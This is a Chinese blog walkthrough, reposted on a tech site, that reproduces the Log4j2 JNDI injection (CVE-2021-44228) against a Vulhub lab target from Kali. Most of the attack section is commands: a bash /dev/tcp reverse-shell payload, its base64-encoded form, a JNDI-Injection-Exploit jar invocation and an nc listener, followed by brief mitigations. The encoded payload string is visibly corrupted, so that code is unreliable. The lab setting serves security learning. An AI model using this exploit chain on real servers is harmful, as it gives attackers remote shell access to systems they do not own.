• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

log4j2漏洞复现 (CVE-2021-44228)

武飞扬头像
莫路客
帮助2

一.漏洞原理:

Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。

二.靶场环境:

靶机:CentOS 7   搭建Vulhub环境

攻击机:Kali

启动环境后出现下方图片,证明搭建成功了

学新通

三. 漏洞测试

用kali访问该地址

学新通

漏洞点位在action参数,我这里利用dnslog来验证

学新通

学新通

构造一个LDAP或者RMI服务器

 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

构造payload:bash -i >& /dev/tcp/ip(地址)/9999 0>&1

转换一下编码

学新通

bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTqWeRvTs42OS85OTk5IDA JjE=}|{base64,-d}|{bash,-i} 

开启工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTqWeRvTs42OS85OTk5IDA JjE=}|{base64,-d}|{bash,-i}" -A "192.168.0.0"

-C payload -A 攻击机的IP

学新通

 这里有多个java版本的exp,如果不成功可以换个版本

监听端口

nc -lvnp 9999

学新通

在url地址中输入payload

学新通

反弹shell成功

学新通

修复:

  1.  
    1. 升级最新版本
  2.  
    2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"
  3.  
    3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS""true"
  4.  
    4. 关闭应用的网络外连。

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhfkfaab
系列文章
更多 icon
同类精品
更多 icon
继续加载